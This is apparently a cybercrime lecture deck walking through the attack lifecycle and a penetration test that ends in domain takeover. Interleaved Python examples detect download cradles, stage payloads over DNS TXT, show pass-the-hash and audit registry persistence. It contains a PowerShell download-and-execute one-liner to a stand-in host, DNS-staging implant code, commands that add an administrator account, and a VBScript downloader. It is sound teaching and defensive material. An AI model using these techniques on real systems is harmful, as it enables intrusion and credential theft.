2. 1. Objectives
2. Introduction
3. Cyber Attack Lifecycle
4. Vulnerabilities and Exploitation
5. Social Engineering and Advanced Persistent Threats
6. Example of a penetration test scenario
7. Conclusion
5. Introduction
What is Cyber Crime?
Computer crime, or cybercrime, is crime that involves a computer and a network
Two types of cyber crime:
Technology is the target: enterprise systems, state systems, personal systems
Technology is the instrument: criminal activities carried out on the Internet
This session is focused on the first type
6. Introduction
Technology = Target:
- Distributed Denial of Service
- Hacking
- Malware, Ransomware
- Phishing
- Hacktivism
- …
Technology = Instrument:
- Child pornography
- Incitement to racial hatred
- Incitement to terrorism
- Money laundering
- Drug sales
- Spam
- …
7. Introduction
Cyber Crime
Has evolved drastically over the past years, following the global evolution of ICT supporting human activity
Allows cyber criminals to make profits comparable to those of other types of crime
Offers advantages over other criminal activities: anonymity, discretion, no borders
Remains little prosecuted, with no international legislation
Has evolved into cyber war, with state-sponsored attacks
Will affect our daily life (connected cars, Operational Technology, IoT)
Cost of cyber crime in Belgium: 3.5 billion euros
8. Introduction
Evolution of Cyber Crime
[Figure: sophistication of cyber crime over time, rising through four stages]
1985-1995, Entertainment: first worms, phone hacking
Hacktivism: virus spread, website defacement
Organized crime: DDoS, hacking of company systems, data leaks, industrial espionage
2010-2017-…, Cyber war: targeted attacks, state-sponsored attacks
9. Introduction
Cyber War – NSA Hacking Tools Leak (2017)
1. An NSA contractor has NSA hacking tools on his PC
2. The contractor installs a trojan
3. The contractor runs a full scan
4. Kaspersky AV discovers the malware together with the NSA hacking tools
5. Russian spies somehow become aware of the discovery of the NSA tools (Kaspersky denies passing on any information)
6. Russian spies further hack the contractor's PC
11. Introduction
Future of Cyber Crime
Intensification of targeted cyber attacks against enterprises, with major impacts (financial, reputation..)
Predominance of Advanced Persistent Threats targeting the end user
99% of system compromises will still use unpatched vulnerabilities
Intensification of cyber war / cyber espionage activities between nations
Increase of cyber crime targeting connected objects and Operational Technology:
Mirai botnet – 2016
Hackable cardiac devices – 2017
Wi-Fi baby heart monitor device – 2017
Jeep SUV hack – 2015
12. Introduction
Legal evolution
General Data Protection Regulation (GDPR): adopted in 2016, applies from 25 May 2018
Circulars of the National Bank of Belgium: regulation for the financial sector
Data breach notification standard: notify within 72 hours
Fines in case of a data leak: up to 4% of annual worldwide turnover or 20 M€, whichever is higher
14. Cyber Attack Lifecycle
1 Reconnaissance
- Public information
- Social networks
- Vulnerability scanning
- Physical observation
2 Initial Infection
- Vulnerabilities
- Virus / malware
- Social engineering
- Physical intrusion
3 Gain Control
Control the infected system
4 Privilege Escalation
Gain elevated privileges on the infected system
5 Lateral Movement
Compromise more systems deeper in the network
6 Persistence
Maintain a persistent connection with the infected systems
7 Malicious Activities
- Data exfiltration
- Hacking websites
- Money extortion
15. Cyber Attack Lifecycle
> Reconnaissance
The reconnaissance process is a key activity
Indeed, during this phase crucial information is obtained in order to perform the cyber attack
For instance, the information is used to determine the best attack vector to use
Activities performed are:
Collect information about the target (websites, telephone numbers, general mailboxes..) from public sources
Collect information through direct contact such as phone calls (fake poll, job seeker..)
Collect technical information about the target information system (exposed systems, partners, data centers..)
Collect information on the premises (garbage, WiFi scanning..)
Actively scan the enterprise networks exposed on the Internet
17. Cyber Attack Lifecycle
> Reconnaissance
After the reconnaissance activities, attackers must have obtained enough information to determine the best attack vectors for the initial infection phase
For instance:
Vulnerabilities affecting systems exposed on the Internet
Weak physical access control at the facilities
Social engineering attack on profiles selected, for instance, from social network information
18. Cyber Attack Lifecycle
> Initial Infection
Initial infection is aimed at obtaining a first backdoor within the target information system
Vectors:
Exploiting a vulnerability affecting the victim's system(s)
Infection through a virus / malware
Exploiting a physical vulnerability
21. Cyber Attack Lifecycle
> Initial Infection
IDS/IPS bypass: encryption
Anti-virus bypass:
Use a simple PowerShell one-liner as a dropper which fetches an encrypted payload over the Internet:
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"
Use unknown (custom) malware for which no signature exists yet
Use staging to decouple the payload from the initial dropper: the stage is injected directly into memory
Fileless malware infection: nothing is written to disk for the AV to scan
Firewall bypass: use « reverse » connections, initiated by the victim towards the C&C
E.g. HTTPS passing through the enterprise proxy
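The one-liner above is exactly what a process-creation log (Sysmon event 1, Windows 4688) records, so it is also where a defender catches it. The following triage function is an added example, not code from the slides or from Metasploit: it decodes -EncodedCommand arguments and flags a command line only when it both executes in memory (IEX) and fetches or decodes a payload, so stealth flags alone (as on a legitimate scheduled script) are not enough. The sample command lines are constructed.

```python
"""Triage PowerShell command lines for the download-cradle pattern used by one-line droppers.

Added example (not from the slides). Input is a constructed list of process command lines
such as a Sysmon event 1 / 4688 log would contain; nothing here talks to the network.
"""
import base64
import re

# Each indicator is (name, pattern). A cradle needs in-memory execution AND a remote or
# encoded source, so no single indicator is a verdict on its own.
INDICATORS = [
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("remote_fetch", re.compile(
        r"New-Object\s+(?:System\.)?Net\.WebClient|\.Download(?:String|File|Data)\(|Invoke-WebRequest|\biwr\b",
        re.I)),
    ("base64_payload", re.compile(r"FromBase64String", re.I)),
    ("stealth_flags", re.compile(
        r"-(?:nop|noprofile|noni|noninteractive|w\s+hidden|windowstyle\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b",
        re.I)),
]
ENCODED_CMD = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of a UTF-16LE script; return the script or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmdline: str) -> dict:
    decoded = decode_encoded_command(cmdline)
    # Match the decoded script as well, otherwise -enc hides every keyword.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, pat in INDICATORS if pat.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    verdict = "in_memory_exec" in hits and ("remote_fetch" in hits or "base64_payload" in hits)
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "verdict": verdict}


def triage(cmdlines):
    return [analyse(c) for c in cmdlines]


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: the slide's one-liner, its -enc variant, and two benign admin lines.
SAMPLE_COMMANDS = [
    "powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))\"",
    "powershell.exe -nop -w hidden -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://EvilWebSite/payload.txt')"),
    r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\nightly-backup.ps1",
    "powershell.exe Get-Service | Where-Object Status -eq Running",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_COMMANDS):
        print("SUSPICIOUS" if r["verdict"] else "ok        ", r["indicators"], r["cmdline"][:70])
```

The third sample shows why the verdict requires two indicators: -NoProfile is a stealth flag, but without IEX and a fetch it is just a normal scheduled script.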
22-25. Cyber Attack Lifecycle
> Initial Infection
Metasploit + SET (Social Engineering Toolkit)
Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server
[Screenshots, one per slide:]
Create the PowerShell payload
Move the payload to the evil web server
Create the « Dropper »
Start the listener
26. Cyber Attack Lifecycle
> Gain Control
Once the initial infection is performed, the objective is to get control over the machine
For this, a network connection must be established between the victim and the Command & Control server
In general a « reverse » connection (from the victim to the C&C) is made to bypass inbound firewall protection
Several techniques exist to bypass outbound filtering (if present)
27. Cyber Attack Lifecycle
> Gain Control
Standard enterprise security principles for outbound filtering:
Default policy is to deny all outbound connections
Allowed outbound connections must go through a proxy
Outbound connections must conform to the expected protocol
Outbound connections must pass other checks as well
Examples of outbound filtering evasion techniques:
Reverse HTTP and/or HTTPS traffic, with or without honouring the system proxy settings
Payload staging over DNS by placing the payload in TXT records of a domain: the implant then only needs DNS resolution, which is usually permitted through the internal resolvers
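To make the DNS TXT staging technique concrete, here is an added example (not from the slides or any C2 framework) showing both ends: the attacker side cuts a base64 stage into numbered TXT records of at most 255 bytes plus a manifest with a digest, the implant side pulls and verifies it, and a defender-side function flags the query pattern this leaves in resolver logs. An in-memory dict stands in for the authoritative zone and the resolver, so it runs offline; stage.example.com is a hypothetical domain and the stage bytes and query log are constructed.

```python
"""Payload staging over DNS TXT records: attacker-side chunking and implant-side reassembly.

Added example (not from the slides). An in-memory dict stands in for the attacker's
authoritative zone and for the resolver so that this runs offline; stage.example.com is
a hypothetical domain, SAMPLE_STAGE and SAMPLE_QUERY_LOG are constructed.
"""
import base64
import hashlib
from collections import defaultdict

TXT_CHUNK = 255                       # RFC 1035: one <character-string> in a TXT RR is <= 255 bytes
STAGE_DOMAIN = "stage.example.com"    # hypothetical attacker-controlled zone


def build_zone(payload: bytes, domain: str = STAGE_DOMAIN) -> dict:
    """Attacker side: base64 the stage, cut it into numbered TXT records, add a manifest."""
    b64 = base64.b64encode(payload).decode("ascii")
    chunks = [b64[i:i + TXT_CHUNK] for i in range(0, len(b64), TXT_CHUNK)]
    zone = {f"{i}.{domain}": chunk for i, chunk in enumerate(chunks)}
    # The manifest tells the implant how many records to pull and lets it verify the result.
    zone[f"manifest.{domain}"] = f"{len(chunks)}:{hashlib.sha256(payload).hexdigest()}"
    return zone


def resolve_txt(zone: dict, name: str) -> str:
    """Stand-in for a TXT lookup through the enterprise resolver (which is why it passes filtering)."""
    if name not in zone:
        raise LookupError(f"NXDOMAIN {name}")
    return zone[name]


def fetch_stage(zone: dict, domain: str = STAGE_DOMAIN) -> bytes:
    """Implant side: read the manifest, pull every chunk, verify the digest, return the stage."""
    count, digest = resolve_txt(zone, f"manifest.{domain}").split(":")
    b64 = "".join(resolve_txt(zone, f"{i}.{domain}") for i in range(int(count)))
    payload = base64.b64decode(b64)
    if hashlib.sha256(payload).hexdigest() != digest:
        raise ValueError("stage digest mismatch: truncated, corrupted or tampered")
    return payload


def staging_indicators(query_log, threshold: int = 4) -> dict:
    """Defender side: domains receiving a burst of TXT lookups for purely numeric labels."""
    counts = defaultdict(int)
    for qname, qtype in query_log:
        labels = qname.split(".")
        if qtype == "TXT" and labels[0].isdigit():
            counts[".".join(labels[1:])] += 1
    return {d: n for d, n in counts.items() if n >= threshold}


# Constructed stage: any bytes would do; the size is chosen so it spans several TXT records.
SAMPLE_STAGE = b"# constructed stand-in for a stage script, not real malware\n" * 40

# Constructed resolver log: (qname, qtype) tuples as a DNS server log would give them.
SAMPLE_QUERY_LOG = [(f"{i}.{STAGE_DOMAIN}", "TXT") for i in range(10)] + [
    ("www.example.com", "A"), ("_dmarc.example.com", "TXT"), ("1.example.net", "A")]

if __name__ == "__main__":
    zone = build_zone(SAMPLE_STAGE)
    print(len(zone) - 1, "TXT chunks;", len(fetch_stage(zone)), "bytes reassembled")
    print("staging suspects:", staging_indicators(SAMPLE_QUERY_LOG))
```

The digest in the manifest matters to the attacker as much as to anyone: a truncated or cached-stale record would otherwise be injected into memory as is. The detection side is deliberately simple; in practice the same numeric-label burst also shows up as unusually large TXT answers for a domain nobody else in the enterprise resolves.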
28. Cyber Attack Lifecycle
> Gain Control
Metasploit / Meterpreter
Meterpreter is an advanced, dynamically extensible payload
that uses in-memory DLL injection stagers and is extended
over the network at runtime. It communicates over the
stager socket and provides a comprehensive client-side Ruby
API. It features command history, tab completion, channels,
and more.
29. Cyber Attack Lifecycle
> Privilege Escalation
Escalate privileges from the infected machine in order to gain elevated access
Typical example is getting Administrator privileges
Several techniques:
« Local exploits » against local applications or the OS on the infected machine
Manual search for credentials in scripts
Password hash dump (e.g. SAM, /etc/shadow) and cracking
Authenticated session grabbing (e.g. VPN sessions)
LSASS process dump (Mimikatz)
SSH keys
World-writable files
Reading command history files
Batch / job alteration
Process injection: try injecting malicious code into processes running under a « Domain Admin » privileged user
30. Cyber Attack Lifecycle
> Privilege Escalation
Metasploit: « Incognito » module
Allows impersonating authentication tokens on compromised Windows hosts
The backdoor must run under « SYSTEM » or « Administrator » privileges in order to see interesting authentication tokens
TIP: File servers are virtual treasure troves of tokens, since most file servers are mapped as network drives via domain logon scripts
31. Cyber Attack Lifecycle
> Lateral Movement
From infected systems, try to infect more systems deeper in the network
Basically repeat the cyber attack lifecycle process (recon, initial infection, privilege escalation…)
Aim for high-value systems: Windows domain controllers, file servers..
Techniques:
Credential re-use / pass-the-hash / SSH key re-use
Vulnerabilities in internal applications (less often patched)
Network segmentation issues between environments (e.g. port 445 open): PsExec with pass-the-hash
32. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Basically using the first compromise to allow, and even aid in, the compromise of other, otherwise inaccessible systems
33. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Use Autoroute to make the compromised host a pivot to other networks
34. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Scan the network through the route created, on ports 139 & 445
35. Cyber Attack Lifecycle
> Lateral Movement
Metasploit – Pivoting technique
Start a new session on a new host using PsExec and the « Pass-The-Hash » technique, re-using the local Administrator password hash
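Why does a dumped hash (slide 29: SAM dump, LSASS dump) log you in over PsExec without the password? Because in NTLM the client never sends the password: it proves knowledge of the NT hash, which is MD4 of the UTF-16LE password with no salt, and the server checks the proof against the same stored hash. The following is an added example, not code from the slides, Metasploit or PsExec: a pure-Python MD4 (hashlib's md4 is often missing on current OpenSSL builds), the NT hash, the NTLMv2 proof from MS-NLMP, and a demo in which a "client" holding only the dumped hash produces a proof the server accepts. User, domain, password and challenges are constructed values.

```python
"""Why pass-the-hash works: the NTLMv2 proof needs only the NT hash, never the password.

Added example (not from the slides, Metasploit or PsExec). MD4 is written out in pure
Python because many OpenSSL builds no longer expose it through hashlib. User, domain,
password and challenges are constructed sample values.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
_R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)   # RFC 1320 round 2 word order
_R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)   # RFC 1320 round 3 word order


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. An NT hash is MD4 of the UTF-16LE password, with no salt and no iteration."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        v = [a, b, c, d]
        for i in range(48):
            # The RFC rotates the roles of a, b, c, d by one position every step.
            ai, bi, ci, di = (-i) % 4, (1 - i) % 4, (2 - i) % 4, (3 - i) % 4
            bb, cc, dd = v[bi], v[ci], v[di]
            if i < 16:
                f, k, s, add = (bb & cc) | (~bb & dd), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, add = (bb & cc) | (bb & dd) | (cc & dd), _R2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, add = bb ^ cc ^ dd, _R3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            v[ai] = _rotl((v[ai] + (f & MASK) + x[k] + add) & MASK, s)
        a, b, c, d = (a + v[0]) & MASK, (b + v[1]) & MASK, (c + v[2]) & MASK, (d + v[3]) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """What the SAM / NTDS / LSASS hold for a user; this is the value a dump yields."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """MS-NLMP NTLMv2: NTProofStr = HMAC_MD5(HMAC_MD5(NThash, UPPER(user)+domain), ServerChallenge + blob).
    Nothing in this computation needs the cleartext password."""
    key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def server_accepts(stored_nt, user, domain, server_challenge, blob, proof) -> bool:
    """The server (or DC) recomputes the proof from the stored hash; it never sees a password."""
    return hmac.compare_digest(ntlmv2_proof(stored_nt, user, domain, server_challenge, blob), proof)


def pass_the_hash_demo() -> tuple:
    """Returns (server accepts the real client, attacker's hash-only proof equals the real one)."""
    user, domain, password = "svc_backup", "CORP", "Winter2017!"            # constructed
    stored = nt_hash(password)                                               # held by the target
    server_challenge = bytes.fromhex("0123456789abcdef")                     # constructed 8 bytes
    # Minimal NTLMv2 'temp' blob: version, reserved, timestamp, client challenge, reserved.
    blob = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + bytes(range(8)) + b"\x00" * 4
    legit = ntlmv2_proof(nt_hash(password), user, domain, server_challenge, blob)  # real client
    dumped = stored                                                          # attacker: hash only
    forged = ntlmv2_proof(dumped, user, domain, server_challenge, blob)
    return server_accepts(stored, user, domain, server_challenge, blob, legit), forged == legit


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("server accepts legit, forged == legit:", pass_the_hash_demo())
```

The unsalted MD4 is also why the cracking step on slide 29 is cheap (identical passwords give identical hashes across all machines, which is what makes the replicated local Administrator password on the following slides so valuable), and why the fix is to stop the hash from being reachable rather than to make it stronger: LAPS-style unique local passwords, no admin logons to workstations, Protected Users, SMB signing.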
36. Cyber Attack Lifecycle
> Maintain Persistence
Prevent loss of connection between the infected machines and the C&C
Techniques:
Create jobs / scheduled tasks
Create a service running at startup
Use AppInit DLLs (disabled since Windows 8 when Secure Boot is enabled)
Bootkit / rootkit
Default file associations
Logon scripts
Modification of applications / services
Registry Run keys
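Several of the locations above (Run keys, AppInit_DLLs) live in the registry, so a responder can review them from a .reg export taken off the host. The audit below is an added example, not code from the slides or any tool: it parses regedit's text format and applies a few heuristics (binary in a user-writable directory, launch via a script host or LOLBin, hidden or encoded PowerShell, AppInit_DLLs set while loading is enabled). The export and the flagged paths are constructed.

```python
"""Audit a .reg export of Windows autostart locations for backdoor-style persistence.

Added example (not from the slides). REG_SAMPLE is a constructed export in the text
format regedit / 'reg export' produce; the rules are heuristics a responder would
tune, not an allow-list, and the flagged paths are invented for the sample.
"""
import re

AUTOSTART_KEY = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce|RunServices)$", re.I)
APPINIT_KEY = re.compile(r"\\Windows NT\\CurrentVersion\\Windows$", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
SCRIPT_HOST = re.compile(r"\b(?:powershell|pwsh|wscript|cscript|mshta|regsvr32|rundll32|certutil)(?:\.exe)?\b", re.I)
STEALTH_FLAGS = re.compile(r"-(?:enc|encodedcommand|w\s+hidden|windowstyle\s+hidden|nop|ep\s+bypass)\b", re.I)


def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: data}}; REG_SZ data is unescaped, other types kept raw."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, data = line[1:].partition('"=')
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def audit(keys: dict) -> list:
    """List (key, value_name, data, reasons) for entries matching the persistence heuristics."""
    findings = []
    for key, values in keys.items():
        if AUTOSTART_KEY.search(key):
            for name, cmd in values.items():
                reasons = []
                if USER_WRITABLE.search(cmd):
                    reasons.append("binary in a user-writable location")
                if SCRIPT_HOST.search(cmd):
                    reasons.append("script host / LOLBin used to launch")
                if STEALTH_FLAGS.search(cmd):
                    reasons.append("hidden or encoded PowerShell")
                if reasons:
                    findings.append((key, name, cmd, reasons))
        elif APPINIT_KEY.search(key):
            dlls = values.get("AppInit_DLLs", "")
            # Loading is on unless LoadAppInit_DLLs is explicitly 0.
            if dlls and values.get("LoadAppInit_DLLs", "dword:00000001") != "dword:00000000":
                findings.append((key, "AppInit_DLLs", dlls, ["DLL injected into every user32 process"]))
    return findings


# Constructed export: two legitimate entries, a hidden PowerShell dropper, a fake svchost
# in a roaming profile, and an AppInit DLL.
REG_SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Backup agent"="\"C:\\Program Files\\Acme\\agent.exe\" /tray"
"svchost"="C:\\Users\\bob\\AppData\\Roaming\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\ProgramData\\helper.dll"
"LoadAppInit_DLLs"=dword:00000001
'''

if __name__ == "__main__":
    for key, name, data, reasons in audit(parse_reg(REG_SAMPLE)):
        print(f"{key}\n  {name} = {data}\n  -> {'; '.join(reasons)}")
```

Scheduled tasks, services and logon scripts from the same list are not in the registry export in a useful form; for those, compare the task XML under C:\Windows\System32\Tasks and the service ImagePath values against a known-good baseline in the same spirit.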
37. Cyber Attack Lifecycle
> Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the
compromised host boots
39. Cyber Attack Lifecycle
> Demo
Social engineering scenario
Send a « virus » to the victim which consists of a Metasploit Meterpreter instance
Undetected by an up-to-date commercial antivirus
1. Prepare malware & environment
2. Send malware
3. Execute malware
4. Get infected & contact C&C
5. Interact
41. Vulnerabilities and Exploitation
A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and/or availability
Simple: default password. Complex: buffer overflow in an application
Dozens of new vulnerabilities are officially classified every day
http://www.cvedetails.com
Dozens of others are not disclosed!
0DAY: vulnerabilities not yet discovered by the vendor, or not disclosed to it
Vulnerabilities are discovered by:
Researchers, students (ethical hackers)
Professional researchers (vulnerability brokers)
http://www.zerodayinitiative.com/
France: Vupen Security sells vulnerabilities to the NSA
Cyber criminals (0DAYS)
42. Vulnerabilities and Exploitation
Full disclosure principle
Vulnerabilities are reported and published publicly as soon as discovered, without regard to whether a patch is available
Responsible disclosure principle
Vendors are notified first
The vulnerability is publicly disclosed after 45 days
Websites with vulnerabilities and associated exploits:
www.securityfocus.com
www.1337day.com (not free)
http://www.cvedetails.com/
http://www.exploit-db.com/
Underground websites on the TOR network
Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (DE), blackhat.com (US)
44. Vulnerabilities and Exploitation
Why do vulnerabilities exist?
Complexity of systems, application code, communication flows, network segmentation
Out-of-the-box vulnerabilities of vendor solutions, lack of security configuration (Next->Next->Next syndrome)
Lack of secure coding awareness (OWASP Top 10)
Lack of enforcement of security during IT projects: security implies cost and time
Need for functionality <-> need for security
Blacklist mode / learning mode
46. Human Vulnerabilities / Social Engineering
Social engineering is the preferred attack vector as it is generally the easiest way to bypass preventive security measures
Targets can be the company's employees but also partners / subcontractors
Two types of social engineering:
Human SE
Technical SE
47. Human Vulnerabilities / Social Engineering
Technical SE is aimed at compromising end-user systems
Transmission of the malware follows « authorized » routes, such as e-mail and/or web browsing
This bypasses security measures such as perimeter security, firewalls, ..
1. INFECTION
2. CONTROL
48. Human Vulnerabilities / Social Engineering
Attack methodologies:
Encourage users to install remote-control tools such as « TeamViewer » or « LogMeIn »
Send malware through e-mail:
Word/Excel documents with malicious macros
PDF files exploiting PDF reader vulnerabilities
Send mail containing links to malicious web sites
Send phishing SMS to smartphones (SMiShing)
Drop USB keys containing viruses (STUXNET)
USB gadgets configured to simulate a keyboard
49. Human Vulnerabilities / Social Engineering
USB gadgets
Nowadays systems are in general protected against USB infection through the autorun functionality
New method -> malicious Human Interface Devices (« Hacker Interface Devices »)
Attackers embed malicious code within USB gadgets
Once connected, those gadgets present themselves as a keyboard and start sending commands to the computer (keystroke injection)
Those commands can drop a malware as easily as the other techniques
Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe
51. Penetration test example
Context: black box intrusion test. Scope: external-facing systems
[Diagram: Internet -> web servers (ports 80 HTTP and 443 HTTPS) in the DMZ -> Intranet / enterprise Windows domain on the internal network]
52. Penetration test example
VULN 1/2: vulnerable deployment of SAP BusinessObjects (Apache Axis2)
CVE-2010-0219: Apache Axis2 default credentials
http://www.securityfocus.com/bid/40343: Apache Axis2 directory traversal
See earlier:
Vuln « Directory Traversal »
Vuln « Default Password »
Together they give admin credentials to Axis2
55. Penetration test example
A Metasploit module exists to exploit this vuln: Axis2 / SAP BusinessObjects Authenticated Code Execution
http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
We use it to deploy a reverse shell backdoor on the server, which connects back to our C&C on port 80
VULN 3: the server is allowed to contact any host on the Internet on ports 80 and 443
[Diagram: web server in the DMZ (ports 80/443 exposed) connecting out on port 80 to the C&C server; Intranet / enterprise Windows domain on the internal network]
56. Penetration test example
Not possible to upload a Meterpreter (killed by the AV on the machine)
Possible to upload a backdoor which sends me back a DOS command prompt from the server
57. Penetration test example
Next step: create a privileged account on the server
VULN 4: the application server is running under ADMIN privileges
Net user temptest password /add
Net localgroup Administrators temptest /add
Obtain a Remote Desktop connection
Problem: port 3389 is closed inbound
Solution: create a reverse SSH tunnel (outbound on port 443) with remote port forwarding of port 3389
[Diagram: C&C server on port 80; SSH server on port 443; reverse SSH tunnel from the web server over port 443 carrying port 3389 back to the tester]
58. Penetration test example
To create the tunnel, I need to download an SSH client onto the server using the DOS command prompt
I create a VBScript downloader with the « Echo » command (one Echo per script line, each appended to dl.vbs), then execute it with cscript:
Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
Cscript dl.vbs
Then use plink to create the tunnel
The complete dl.vbs:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.putty.com/plink.exe", False ' plain HTTP: port 80 is allowed outbound (VULN 3)
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "c:\temp\plink.exe", 2 '//overwrite
end with
59. Penetration test example
[Diagram: C&C server on port 80; SSH server on port 443; reverse SSH tunnel over port 443 exposing the web server's port 3389]
Connect to RDP through the tunnel with the user account I just created:
temptest
password
60. Penetration test example
Next step -> lateral movement, the simplest first: credential reuse
I need to crack all the passwords present locally on the infected server
Vuln 6/7: Windows 2003 design vulnerabilities
VULN 6: the « repair » directory contains a SAM backup file holding the local account credentials as LM hashes
VULN 7: the LM hash algorithm is weak (the password is upper-cased, padded or truncated to 14 characters and split into two 7-character halves, each used as a DES key) and cracks easily
62. Penetration test example
VULN 8: the local Administrator password is replicated across all systems in the DMZ
[Diagram: the same reverse SSH tunnel (port 443) and C&C (port 80) now reaching the other DMZ web servers on port 3389]
63. Penetration test example
Next step: try to hit the internal network
VULN 9: DMZ systems are members of the internal Windows domain. This means that critical ports (e.g. 139, 445, …) must be open between the DMZ and the internal network
VULN 10: password replication bis. A Domain Admin user account whose name is identical to a local account has the same password
64. Penetration test example
I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the enterprise domain
[Diagram: web servers (ports 80/443) in the DMZ -> Intranet / enterprise Windows domain -> Domain Controller]